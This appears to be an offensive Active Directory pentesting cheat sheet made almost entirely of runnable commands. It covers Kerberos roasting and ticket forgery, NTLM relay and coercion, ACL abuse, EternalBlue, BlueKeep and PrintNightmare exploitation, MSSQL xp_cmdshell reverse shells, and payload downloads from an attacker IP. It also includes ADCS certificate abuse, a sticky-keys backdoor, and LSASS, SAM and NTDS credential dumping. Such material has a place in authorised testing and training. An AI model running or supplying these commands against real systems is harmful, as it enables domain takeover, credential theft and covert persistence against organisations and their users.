Invoke-Command -ComputerName DC01.domain.local -ScriptBlock { Stop-Service dns; Start-Service dns }

# 6. Cleanup (after exploitation)
dnscmd DC01.domain.local /config /serverlevelplugindll ""
sc \\DC01.domain.local stop dns ; sc \\DC01.domain.local start dns

# Add wildcard DNS record (captures all resolutions)
# Requires write rights on DNS zone (Domain Users by default in some configs)
Invoke-DNSUpdate -DNSType A -DNSName * -DNSData 10.10.14.1 -Realm domain.local

# + Responder to capture NTLM hashes
sudo responder -I eth0 -wdP

# Check if port is open (= DC)
nmap -p 88 --open 10.10.10.0/24

# User enumeration via AS-REQ (pre-auth error vs administrator not found)
kerbrute userenum -d domain.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt --downgrade -o valid_users.txt
kerbrute userenum --dc 10.10.10.10 -d domain.local users.txt -t 50

# P@ssw0rd spray (1 password x N users)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Welcome1!'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Password2024!' --delay 3000

# Targeted brute force
kerbrute bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt targetuser

# From Linux (no credentials)
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt -format hashcat
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt -outputfile asrep.hashes

# With credentials (auto-enumerates vulnerable accounts)
impacket-GetNPUsers domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request -format hashcat

# From Windows
.\Rubeus.exe asreproast /outfile:asrep.hashes /format:hashcat /nowrap
.\Rubeus.exe asreproast /administrator:targetuser /format:hashcat /nowrap
Get-DomainUser -PreauthNotRequired | .\Rubeus.exe asreproast

# Crack
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes rockyou.txt --rules-file OneRuleToRuleThemAll.rule

# Forced AS-REP (if GenericWrite on target account)
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}
# ... capture the hash ... then re-enable
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}

# From Linux
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request -outputfile kerb.hashes
impacket-GetUserSPNs domain.local/administrator -hashes :NTLMHASH -dc-ip 10.10.10.10 -request
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request-administrator svcSQL

# From Windows
.\Rubeus.exe kerberoast /outfile:kerb.hashes /nowrap
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /administrator:svcSQL /simple /nowrap
.\Rubeus.exe kerberoast /rc4opsec /nowrap
Get-DomainUser -SPN | select name,serviceprincipalname

# Crack
hashcat -m 13100 kerb.hashes rockyou.txt
hashcat -m 19600 kerb.hashes rockyou.txt
hashcat -m 19700 kerb.hashes rockyou.txt

# Targeted Kerberoasting (if GenericWrite)
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn.domain.local'}
# ... kerberoast and crack ... then cleanup
Set-DomainObject -Identity targetuser -Clear serviceprincipalname

# Prerequisites: krbtgt hash + domain SID

# Get domain SID
Get-DomainSID
wmic useraccount get name,sid | findstr /i admin

impacket-lookupsid domain.local/administrator:P@ssw0rd@10.10.10.10

# Mimikatz - Forge Golden Ticket
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /krbtgt:KRBTGTHASH /id:500 /groups:512,513,518,519,520 /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Rubeus
.\Rubeus.exe golden /rc4:KRBTGTHASH /domain:domain.local /sid:S-1-5-21-XXXXX /administrator:Administrator /id:500 /ptt

# From Linux (Impacket)
impacket-ticketer -nthash KRBTGTHASH -domain-sid S-1-5-21-XXXXX -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-P@ssw0rd domain.local/Administrator@DC01.domain.local

# Silver Ticket - Specific service (CIFS, HOST, LDAP, HTTP, MSSQL...)
# Prerequisites: NTLM hash of machine account or service account

# Mimikatz
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /rc4:MACHINE_NTLM_HASH /target:target.domain.local /service:cifs /id:500 /ptt
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /rc4:MACHINE_NTLM_HASH /target:DC01.domain.local /service:ldap /id:500 /ptt

# Useful services:
# cifs - file access
# host - service management, schtasks
# http - WinRM
# ldap - DCSync
# mssql - SQL Server
# wsman - WinRM/PowerShell Remoting

# Identify machines with unconstrained delegation
Get-DomainComputer -Unconstrained | select dnshostname
Get-ADComputer -Filter {TrustedForDelegation -eq $True} -Properties TrustedForDelegation

netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --trusted-for-delegation

# From compromised machine with unconstrained delegation:
# Monitor incoming TGTs
.\Rubeus.exe monitor /interval:5 /nowrap
.\Rubeus.exe monitor /interval:5 /filteruser:DC$ /nowrap

# Force DC connection (PrinterBug / SpoolSample)
.\SpoolSample.exe DC01.domain.local unconstrained-srv.domain.local
.\MS-RPRN.exe \\DC01.domain.local \\unconstrained-srv.domain.local

# Or PetitPotam (no auth)
python3 PetitPotam.py unconstrained-srv.domain.local DC01.domain.local

# Inject the captured TGT
.\Rubeus.exe ptt /ticket:doIFxTCC...B64...
klist

# Exploit with DCSync
lsadump::dcsync /domain:domain.local /administrator:krbtgt

impacket-secretsdump -k -no-P@ssw0rd domain.local/DC$@DC01.domain.local

# Identify accounts with constrained delegation
Get-DomainUser -TrustedToAuth | select userprincipalname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto

netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M constrained-delegation

# S4U2Self + S4U2Proxy (Rubeus)
.\Rubeus.exe s4u /administrator:svc_constrained /rc4:NTLMHASH /impersonateuser:Administrator /msdsspn:"cifs/DC01.domain.local" /ptt
.\Rubeus.exe s4u /administrator:svc_constrained /rc4:NTLMHASH /impersonateuser:Administrator /msdsspn:"time/DC01.domain.local" /altservice:ldap /ptt

# If delegation to TIME - altservice to access LDAP/CIFS
.\Rubeus.exe s4u /administrator:srv$ /certificate:srv.pfx /impersonateuser:Administrator /msdsspn:"http/target.domain.local" /altservice:cifs,ldap,host /ptt

# From Linux (Impacket)
impacket-getST -spn cifs/DC01.domain.local -impersonate Administrator 'domain.local/svc_constrained:P@ssw0rd'
export KRB5CCNAME=Administrator@cifs_DC01.domain.local@domain.local.ccache
impacket-secretsdump -k -no-P@ssw0rd domain.local/Administrator@DC01.domain.local

# Prerequisites: GenericWrite or GenericAll on a target computer account

# 1. Create a fake computer account (PowerMad)
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount FakePC -P@ssw0rd $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force)

# 2. Get the SID of the fake computer
$sid = Get-DomainComputer FakePC -Properties objectsid | Select -Expand objectsid

# 3. Configure msDS-AllowedToActOnBehalfOfOtherIdentity
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity TargetSrv | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDbytes}

# 4. Get the hash of FakePC
.\Rubeus.exe hash /password:'P@ssw0rd!'

# 5. S4U and ptt
.\Rubeus.exe s4u /administrator:FakePC$ /rc4:NTLM_OF_FAKEPC /impersonateuser:Administrator /msdsspn:CIFS/TargetSrv.domain.local /ptt

# From Linux
impacket-addcomputer domain.local/administrator:P@ssw0rd -computer-name 'FakePC$' -computer-P@ssw0rd 'P@ssw0rd!'
impacket-rbcd -delegate-from 'FakePC$' -delegate-to 'TargetSrv$' -action write domain.local/administrator:P@ssw0rd
impacket-getST -spn cifs/TargetSrv.domain.local -impersonate Administrator 'domain.local/FakePC$:P@ssw0rd!'
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-P@ssw0rd domain.local/Administrator@TargetSrv.domain.local

# Test anonymous bind
ldapsearch -H ldap://10.10.10.10 -x -s base
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=*)" | head -50

# Full anonymous dump
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=administrator)" sAMAccountName description memberOf
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=group)" cn member

# With authentication
ldapsearch -H ldap://10.10.10.10 -D "CN=user,CN=Users,DC=domain,DC=local" -w 'P@ssw0rd' -b "DC=domain,DC=local" "(objectClass=administrator)"
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" -D "domain.local\administrator" -w 'P@ssw0rd' "(admincount=1)" sAMAccountName

# ldapdomaindump
ldapdomaindump -u "domain.local\administrator" -p 'P@ssw0rd' ldap://10.10.10.10
ldapdomaindump -u "domain.local\administrator" -p 'P@ssw0rd' ldap://10.10.10.10 -o /tmp/ldap_dump/

# With NetExec
netexec ldap 10.10.10.10 -u '' -p '' --users
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --users
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --groups
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --password-not-required
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --admin-count
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M get-desc-users
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M ldap-signing

# Nmap LDAP scripts
nmap -p 389,636 --script ldap-search,ldap-rootdse,ldap-brute 10.10.10.10

# Check if LDAP signing is required
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M ldap-signing
nmap -p 389 --script ldap-novell-getpass 10.10.10.10

# Relay NTLM to LDAP (add admin administrator)
impacket-ntlmrelayx -t ldap://10.10.10.10 --escalate-administrator compromised_user
impacket-ntlmrelayx -t ldaps://10.10.10.10 --add-computer FakePC --computer-password 'P@ssw0rd!'

# Relay to LDAP with dump
impacket-ntlmrelayx -t ldap://10.10.10.10 -wh fakewpad.domain.local -l /tmp/ldap_loot

# Via mitm6 (IPv6)
sudo mitm6 -d domain.local &
impacket-ntlmrelayx -6 -t ldaps://10.10.10.10 -wh fakewpad.domain.local --add-computer EvilPC --computer-password 'Pass123!'
# Then use RBCD with the created computer

# Identify exploitable ACLs
Find-InterestingDomainAcl -ResolveGUIDs | select IdentityReferenceName,ActiveDirectoryRights,ObjectDN | ft -wrap
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "compromised_user"}

# GenericAll or GenericWrite - Reset password
$P@ssw0rd = ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $P@ssw0rd

# ForceChangePassword
$cred = New-Object System.Management.Automation.PSCredential("domain.local\administrator", (ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force))
Set-DomainUserPassword -Identity targetuser -AccountPassword $P@ssw0rd -Credential $cred

# GenericWrite - Add member to a group
Add-DomainGroupMember -Identity "Domain Admins" -Members compromised_user

# WriteDACL - Add DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity compromised_user -Rights DCSync -Verbose

# Then DCSync:
impacket-secretsdump domain.local/compromised_user:P@ssw0rd@DC01.domain.local -just-dc

# WriteOwner - Take ownership then modify
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity compromised_user
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity compromised_user -Rights All
Set-DomainUserPassword -Identity targetuser -AccountPassword $P@ssw0rd

# AdminSDHolder (persistence via ACL propagation every 60 min)
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity compromised_user -Rights All

# Check SMB signing (required for relay)
nmap -p 445 --script smb-security-mode,smb2-security-mode 10.10.10.0/24
netexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt

# Null session
enum4linux -a 10.10.10.10
enum4linux-ng -A 10.10.10.10 -oA enum_output
smbclient -N -L //10.10.10.10
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u '' -p ''

# With credentials
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --shares
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --sessions
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --loggedon-users
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --users
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --groups
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --pass-pol
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M spider_plus

# Spider + sensitive file search
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --spider C$ --pattern "*.config,*.xml,*.ini,*.txt,*password*,*cred*"
smbmap -H 10.10.10.10 -u administrator -p P@ssw0rd -R --dir-only
smbclient //10.10.10.10/SHARE -U 'domain.local\administrator%P@ssw0rd' -c 'ls; get file.txt; mget *.xml'

# Nmap SMB scripts
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-ls,smb-os-discovery,smb-vuln-ms17-010 10.10.10.10

# Snaffler (find sensitive files)
.\Snaffler.exe -s -d domain.local -o snaffler.log -v data

# 1. Poisoning (capture NTLMv2)
sudo responder -I eth0 -wdP
sudo responder -I eth0 -A

# Crack captured hashes
hashcat -m 5600 ntlmv2.hashes rockyou.txt
hashcat -m 5600 ntlmv2.hashes rockyou.txt --rules-file best64.rule

# 2. SMB Relay (if SMB signing disabled on target)
# Disable SMB and HTTP in /etc/responder/Responder.conf
sudo responder -I eth0 -wd
impacket-ntlmrelayx -tf relay_targets.txt -smb2support
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "powershell -enc BASE64CMD"
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i

# Relay to LDAP (add account)
impacket-ntlmrelayx -t ldap://DC01.domain.local --escalate-administrator administrator
impacket-ntlmrelayx -t ldaps://DC01.domain.local --add-computer EvilPC --computer-password 'Pass123!'

# Pass-the-P@ssw0rd
impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-smbexec domain.local/administrator:P@ssw0rd@10.10.10.10
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -x "whoami"
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -X "whoami"

# Pass-the-Hash
impacket-psexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-smbexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
netexec smb 10.10.10.10 -u Administrator -H NTLMHASH -x "whoami"
netexec smb 10.10.10.0/24 -u Administrator -H NTLMHASH --local-auth

# atexec (via scheduler)
impacket-atexec domain.local/administrator:P@ssw0rd@10.10.10.10 "whoami"
impacket-atexec domain.local/administrator@10.10.10.10 -hashes :HASH "net administrator hacker P@ss /add /domain"

# Scan
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
netexec smb 10.10.10.10 -u '' -p '' -M ms17-010

# Exploitation (Metasploit)
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.10
set LHOST 10.10.14.1
run

# Impacket
python3 zzz_exploit.py 10.10.10.10

# Nmap
nmap -p 135 --script msrpc-enum 10.10.10.10
nmap -p 135,593 --script rpc-grind 10.10.10.10

# rpcclient
rpcclient -U "" -N 10.10.10.10
rpcclient -U "domain.local\administrator%P@ssw0rd" 10.10.10.10

# Useful rpcclient commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querydominfo
rpcclient $> querydispinfo
rpcclient $> getdompwinfo
rpcclient $> querygroup 0x200
rpcclient $> queryuser 0x1f4
rpcclient $> queryusergroups 0x1f4
rpcclient $> lookupnames administrator
rpcclient $> lsaquery
rpcclient $> lookupnames "Domain Admins"

# impacket rpcdump
impacket-rpcdump 10.10.10.10
impacket-rpcdump domain.local/administrator:P@ssw0rd@10.10.10.10

# SpoolSample (MS-RPRN) - force NTLM auth to a controlled host
python3 printerbug.py domain.local/administrator:P@ssw0rd@DC01.domain.local 10.10.14.1
.\SpoolSample.exe DC01.domain.local attacker.domain.local

# PrintNightmare (CVE-2021-1675 / CVE-2021-34527) - RCE SYSTEM
# Linux (Impacket)
python3 CVE-2021-1675.py domain.local/administrator:P@ssw0rd@10.10.10.10 '\\10.10.14.1\share\evil.dll'

# PowerShell (local privesc to SYSTEM)
.\CVE-2021-1675.ps1
Invoke-Nightmare -DLL "C:\evil.dll"
# Add admin without custom DLL
Invoke-Nightmare -DriverName "Legit" -NewUser "hacker" -NewPassword "P@ssw0rd!"

# Scan
nmap -p 5985,5986 --open 10.10.10.0/24
netexec winrm 10.10.10.10 -u administrator -p P@ssw0rd
netexec winrm 10.10.10.0/24 -u administrator -p P@ssw0rd

# Check WinRM access (PowerShell)
Test-WSMan -ComputerName target.domain.local
Test-WSMan -ComputerName 10.10.10.10 -Authentication Kerberos

# Evil-WinRM
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd -s /opt/scripts
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd -e /opt/exes
evil-winrm -i 10.10.10.10 -u administrator -k -S

# Inside evil-winrm
menu
upload /local/path /remote/path
download /remote/path /local/
Invoke-Binary /opt/SharpHound.exe

# Pass-the-Hash to WinRM (if account in Remote Management Users)
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH

# From Mimikatz + PTH
sekurlsa::pth /administrator:administrator /domain:domain.local /ntlm:HASH /run:"powershell -nop -c 'Enter-PSSession -ComputerName target'"

# Via Impacket
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-wmiexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# Scan
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 10.10.10.0/24
netexec rdp 10.10.10.0/24 -u administrator -p P@ssw0rd
netexec rdp 10.10.10.10 -u administrator -p P@ssw0rd --screenshot

# Test access
xfreerdp /v:10.10.10.10 /u:administrator /p:P@ssw0rd /cert-ignore
rdesktop -u administrator -p P@ssw0rd 10.10.10.10

# Check/enable Restricted Admin Mode
reg query "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin
# Enable from existing session
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

# Pass-the-Hash via RDP
xfreerdp /v:10.10.10.10 /u:Administrator /pth:NTLMHASH /cert-ignore

# Via Mimikatz
sekurlsa::pth /administrator:Administrator /domain:domain.local /ntlm:NTLMHASH /run:"mstsc.exe /restrictedadmin"

# List active RDP sessions (from SYSTEM shell)
qwinsta /server:10.10.10.10
query session /server:10.10.10.10

# Hijack a session without password (SYSTEM required)
# Create a service to connect to the session
sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
net start sesshijack

# Via tscon directly (SYSTEM)
tscon 2 /dest:rdp-tcp#13

# Bypass "Single Session per User"
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

# Sticky Keys backdoor (persistence)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
# Press 5x Shift on login screen - SYSTEM shell

# Scan
nmap -p 3389 --script rdp-vuln-ms12-020 10.10.10.10
netexec rdp 10.10.10.10 -u '' -p '' -M bluekeep

# Metasploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 10.10.10.10
set TARGET 2
run

# Discover MSSQL instances
nmap -p 1433 --script ms-sql-info,ms-sql-config,ms-sql-empty-password 10.10.10.0/24
netexec mssql 10.10.10.0/24 -u '' -p '' 2>/dev/null
netexec mssql 10.10.10.0/24 -u sa -p '' --local-auth

# Connection
impacket-mssqlclient domain.local/administrator:P@ssw0rd@10.10.10.10 -windows-auth
impacket-mssqlclient domain.local/administrator@10.10.10.10 -hashes :NTLMHASH -windows-auth
impacket-mssqlclient sa:P@ssw0rd@10.10.10.10

# From Windows (PowerUpSQL)
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLInstanceDomain | Get-SQLConnectionTest
Get-SQLInstanceDomain | Get-SQLServerInfo
Invoke-SQLAudit -Verbose

-- Enable xp_cmdshell (if SA or sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Execute commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net administrator hacker P@ss123 /add';
EXEC xp_cmdshell 'net localgroup Administrators hacker /add';
EXEC xp_cmdshell 'powershell -enc BASE64REVSHELL';

-- Capture NTLM hash via UNC path (Responder listening)
EXEC master..xp_dirtree '\\10.10.14.1\share';
EXEC xp_fileexist '\\10.10.14.1\share\test';

-- Read files
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt';

-- Upload file
EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.1/nc.exe C:\Windows\Temp\nc.exe';

-- List impersonatable logins
SELECT distinct b.name FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

-- Impersonate sa
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');
EXEC xp_cmdshell 'whoami';

-- Or impersonate another login
EXECUTE AS LOGIN = 'dbadmin';

-- Enumerate linked servers
EXEC sp_linkedservers;
SELECT * FROM sys.servers;

-- Execute commands on linked server
EXEC ('xp_cmdshell ''whoami'' ') AT [LinkedServer\SQLINSTANCE];
SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=LinkedServer;Trusted_Connection=yes', 'SELECT SYSTEM_USER');

-- Chain multiple links
EXEC ('EXEC (''xp_cmdshell ''''whoami'''' '') AT [Server3]') AT [Server2];

# Automated escalation
Invoke-SQLEscalatePriv -Verbose
Get-SQLInstanceDomain | Invoke-SQLAuditPrivDbChaining -Verbose

# Exec cmd on found instance
Get-SQLInstanceDomain | Invoke-SQLOSCmd -Command "whoami" -RawResults

# Detect AD-related endpoints
whatweb http://10.10.10.10
gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x asp,aspx,php
feroxbuster -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x asp,aspx

# AD CS endpoints (ADCS Web Enrollment)
curl -I http://10.10.10.10/certsrv/
curl -I http://10.10.10.10/certsrv/certfnsh.asp
curl -I http://10.10.10.10/CertSrv/mscep/mscep.dll
curl -I http://10.10.10.10/certsrv/certcarc.asp

# Capture NTLM from internal web page and relay to LDAP
impacket-ntlmrelayx -t ldaps://10.10.10.10 -wh fakewpad.domain.local --add-computer EvilPC --computer-password 'P@ss!'

# Discover CAs
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -stdout
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -vulnerable -stdout
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -json -output adcs

# With NetExec
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M adcs
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M adcs -o SERVER=ca.domain.local

# Certify.exe (Windows)
.\Certify.exe find /vulnerable
.\Certify.exe find /vulnerable /enabled /enrolleeSuppliesSubject
.\Certify.exe cas

# Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + Client Auth EKU + Domain Users enrollment
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'VulnTemplate' -upn administrator@domain.local -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# Windows (Certify)
.\Certify.exe request /ca:DC01.domain.local\CA-NAME /template:VulnTemplate /altname:administrator
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx
.\Rubeus.exe asktgt /administrator:administrator /certificate:admin.pfx /getcredentials /ptt

certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'ESC2-Template' -dc-ip 10.10.10.10
certipy auth -pfx user.pfx -dc-ip 10.10.10.10

# Step 1: Obtain an Enrollment Agent certificate
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'EnrollmentAgent' -dc-ip 10.10.10.10
# Step 2: Use the agent to request a cert for admin
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'User' -on-behalf-of 'domain.local\administrator' -pfx agent.pfx -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# Modify template then ESC1
certipy template -u administrator@domain.local -p P@ssw0rd -template 'TargetTemplate' -save-old -dc-ip 10.10.10.10
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'TargetTemplate' -upn administrator@domain.local -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
# Restore original template
certipy template -u administrator@domain.local -p P@ssw0rd -template 'TargetTemplate' -configuration TargetTemplate.json -dc-ip 10.10.10.10

# Check flag on CA
certutil -config "ca.domain.local\CA-NAME" -getreg CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\EditFlags
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -stdout | grep -i esc6

# Exploit (any template)
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'User' -upn administrator@domain.local -dc-ip 10.10.10.10

# If ManageCA - Enable ESC6 + approve requests
certipy ca -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -add-officer administrator -dc-ip 10.10.10.10
certipy ca -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -enable-template 'SubCA' -dc-ip 10.10.10.10

# Request - Issue - Retrieve
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'SubCA' -upn administrator@domain.local -dc-ip 10.10.10.10
certipy ca -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -issue-request 14 -dc-ip 10.10.10.10
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -retrieve 14 -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# Check HTTP endpoint
curl -I http://ca.domain.local/certsrv/certfnsh.asp

# Terminal 1: Relay to ADCS
impacket-ntlmrelayx -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Force DC auth
python3 PetitPotam.py 10.10.14.1 DC01.domain.local
python3 printerbug.py domain.local/administrator:P@ssw0rd@DC01.domain.local 10.10.14.1

# Use the captured certificate
.\Rubeus.exe asktgt /administrator:DC$ /certificate:BASE64_CERT /ptt

certipy auth -pfx dc.pfx -dc-ip 10.10.10.10
impacket-secretsdump -k -no-P@ssw0rd domain.local/DC$@DC01.domain.local

# ESC9: certificate without SID extension - persistence post password change
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'ESC9-Template' -dc-ip 10.10.10.10
certipy auth -pfx user.pfx -dc-ip 10.10.10.10

# Shadow Credentials (ESC10 / GenericWrite)
certipy shadow auto -u administrator@domain.local -p P@ssw0rd -account targetuser -dc-ip 10.10.10.10

# Enumeration
nmap -p 2049 --script nfs-showmount,nfs-ls,nfs-statfs 10.10.10.10
showmount -e 10.10.10.10

# Mount shares
mkdir /mnt/nfs
mount -t nfs 10.10.10.10:/share /mnt/nfs -o nolock
mount -t nfs -o vers=2 10.10.10.10:/ /mnt/nfs

# Privesc: no_root_squash - create SUID
# Check /etc/exports on the target
cat /etc/exports
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# From target: /tmp/bash -p - root

# Mimikatz direct
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
sekurlsa::tspkg
sekurlsa::dpapi
sekurlsa::ekeys

# Bypass LSA Protection
!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

# Dump LSASS without mimikatz (via Task Manager - Create Dump)
# Analyze the dump:
pypykatz lsa minidump lsass.dmp
.\Mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"

# Comsvcs.dll (LOLBin)
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id lsass.dmp full
# Or via PowerShell
$id = (Get-Process -Name lsass).Id
.\procdump.exe -accepteula -ma $id lsass.dmp

# SAM (local accounts)
reg save HKLM\SAM C:\sam.bak
reg save HKLM\SYSTEM C:\system.bak
reg save HKLM\SECURITY C:\security.bak

# On attacker:
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL

# NTDS.dit via VSS (shadow copy)
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
